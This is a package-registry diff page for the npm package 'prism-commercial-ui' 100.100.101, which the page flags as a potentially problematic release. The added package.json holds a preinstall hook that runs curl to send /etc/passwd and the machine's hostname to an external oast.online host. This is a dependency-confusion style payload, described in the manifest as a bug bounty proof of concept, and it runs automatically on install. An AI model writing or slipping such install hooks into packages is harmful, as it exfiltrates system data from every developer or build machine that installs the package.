prism-commercial-ui 100.100.101
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of prism-commercial-ui might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "prism-commercial-ui",
|
3
|
+
"version": "100.100.101",
|
4
|
+
"description": "This is for bug bounty PoC. Please do not download this!",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).cn2s0kstv0mt0v2ogrnghqwdfjf7ewqr7.oast.online"
|
9
|
+
},
|
10
|
+
"author": "jwosborniv",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|